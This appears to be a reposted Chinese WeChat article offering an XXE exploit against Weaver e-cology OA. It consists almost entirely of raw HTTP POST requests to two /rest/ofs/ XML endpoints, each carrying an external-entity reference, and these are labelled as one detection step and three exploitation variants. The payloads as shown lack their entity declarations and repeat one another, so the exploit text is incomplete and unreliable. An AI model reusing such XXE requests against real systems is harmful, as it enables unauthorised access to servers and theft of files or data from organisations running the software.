检测
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
利用
利用一:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
利用二:
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host:
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
利用三:
可回显,待完善
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host:
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
阅读 10万+
原文始发于微信公众号(利刃信安攻防实验室):【漏洞利用】泛微OA e-cology XXE 漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论